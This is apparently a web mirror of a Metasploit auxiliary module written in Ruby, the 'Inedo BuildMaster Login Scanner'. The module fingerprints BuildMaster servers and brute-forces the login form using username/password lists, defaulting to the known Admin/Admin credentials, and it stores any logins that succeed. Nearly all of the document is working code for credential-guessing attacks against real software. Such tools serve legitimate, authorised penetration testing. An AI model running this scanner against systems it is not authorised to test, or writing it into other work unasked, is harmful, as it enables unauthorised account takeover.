CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/buildmaster_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::AuthBrute8include Msf::Auxiliary::Report9include Msf::Auxiliary::Scanner1011def initialize(info = {})12super(update_info(info,13'Name' => 'Inedo BuildMaster Login Scanner',14'Description' => %{15This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'16which has the default password 'Admin'.17},18'Author' => [ 'James Otten <jamesotten1[at]gmail.com>' ],19'License' => MSF_LICENSE,20'DefaultOptions' => { 'VERBOSE' => true })21)2223register_options(24[25Opt::RPORT(81),26OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),27OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])28]29)30end3132def run_host(ip)33return unless buildmaster?3435each_user_pass do |user, pass|36do_login(user, pass)37end38end3940def buildmaster?41begin42res = send_request_cgi('uri' => '/log-in')43rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE44print_error("#{peer} - HTTP Connection Failed")45return false46end4748if res && res.code == 200 && res.body.include?('BuildMaster_Version')49version = res.body.scan(%r{<span id="BuildMaster_Version">(.*)</span>}).flatten.first50print_good("#{peer} - Identified BuildMaster #{version}")51return true52else53print_error("#{peer} - Application does not appear to be BuildMaster")54return false55end56end5758def login_succeeded?(res)59if res && res.code == 20060body = JSON.parse(res.body)61return body.key?('succeeded') && body['succeeded']62end63false64rescue65false66end6768def do_login(user, pass)69print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")70begin71res = send_request_cgi(72{73'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',74'method' => 'POST',75'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },76'vars_post' =>77{78'userName' => user,79'password' => pass80}81}82)83rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE84vprint_error("#{peer} - HTTP Connection Failed...")85return :abort86end8788if login_succeeded?(res)89print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")90store_valid_credential(user: user, private: pass)91else92print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")93end94end95end969798